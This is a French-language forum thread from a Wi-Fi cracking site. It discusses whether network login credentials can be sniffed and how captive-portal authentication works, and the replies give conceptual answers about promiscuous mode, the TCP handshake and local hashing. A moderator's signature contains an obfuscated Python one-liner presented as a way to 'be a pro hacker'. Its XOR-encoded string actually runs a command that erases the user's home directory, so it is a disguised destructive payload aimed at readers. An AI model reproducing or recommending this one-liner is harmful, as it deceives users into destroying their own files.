Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 06-08-2012 13:04:35

mzutg
Membre Indéboulonnable

Fonctionnement Authentification sur un réseau.

Bonjour !!!!
Je lis de la docu réseau ( OSI, plage, proto....). Donc si je pose une question qui trouverait sa réponse dans la suite de ma lecture, ne m'en voulait pas car j'ai pas encore fini de tout lire.

Je me pose une question. Par exemple vous connaissez  ces  réseaux d'entreprise ou de lycée ou au demmarage, on a une fenetre de login ( sous windows ).

1). Les infos sont-ils envoyés en clair ? si on sniif, on peut récuperer des infos ?

2). Comment le client sait-il où envoyé ces infos ? il décode son masque pour trouver l'ip du réseau auquel il appartient ?

Dernière modification par mzutg (06-08-2012 13:22:35)

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-08-2012 14:03:48

spawn
Modérateur

Re : Fonctionnement Authentification sur un réseau.

1. essaye
2. question mal posée.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 07-08-2012 03:57:47

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Si les la liaison n'est pas sécurisée tu peux éventuellement intercepter et lire le trafic passivement si le réseau n'est pas switché, on parle là d'un réseau filaire et donc tu mets ton interface ethernet en mode promiscuous, dans le cas d'un réseau WIFI la carte serait en mode monitoring (enfin je crois qu'on désigne par promiscuous l'ethernet et de monitoring le WIFI) mais les deux configurations procèdent de la même manière, elles permettent d’écouter.

Si le client sait ou envoyer les infos c'est parce qu'il est allé déjà chercher ces infos sinon comment est-ce possible qu'il affiche une page dont il ne connait pas et n'est pas enregistrée chez lui ? tu as indiqué une URL avec laquelle le client va s'en servir pour aller au serveur et lui communique son adresse IP, le serveur lui répond en communiquant à son tour son adresse IP et la connexion s'établie de façon mutuelle. En lisant la documentation comme tu dis tu as certainement lu qu'un client envoi un ("SYN") le serveur lui répond par ("SYN-ACK") et enfin le client renvoi un ("ACK") et c'est ainsi qu'ils deviennent des amis, aucun des deux ne peut savoir ou se trouve l'autre si personne n'indique son adresse wink

Dernière modification par Fuji (07-08-2012 07:12:20)

#4 11-08-2012 12:43:14

antares145
Membre d'honneur
Site Web

1) La majorité de ces réseaux (je parle des WiFi) de type Hotspot est en OPN donc sans mot de passe. Le sniff est donc possible et facile, mais dans la plupart des cas l'info de login (mot de passe,...) est hachée en local avant d'être transmise. Donc à moins que le système ait été conçu avec deux pieds gauches boiteux, tout ce que tu peux récupérer c'est un hash... wink Y a un moyen "simple" de vérifier, regarde le code-source de la page de login pour voir comment est envoyée l'info, généralement c'est assez clair.

2) Toujours dans la majorité des cas, le client non-authentifié reçoit une adresse IP correcte mais est bloqué plus haut (DNS ou cookie quand c'est mal fait, ou programme dédié). Donc il a déjà une adresse IP, une adresse de passerelle, parfois un semi-DNS local, et le système de hotspot est conçu pour envoyer l'info de login à la bonne machine, le client n'a pas besoin de savoir "où il envoie l'info" smile

Annonce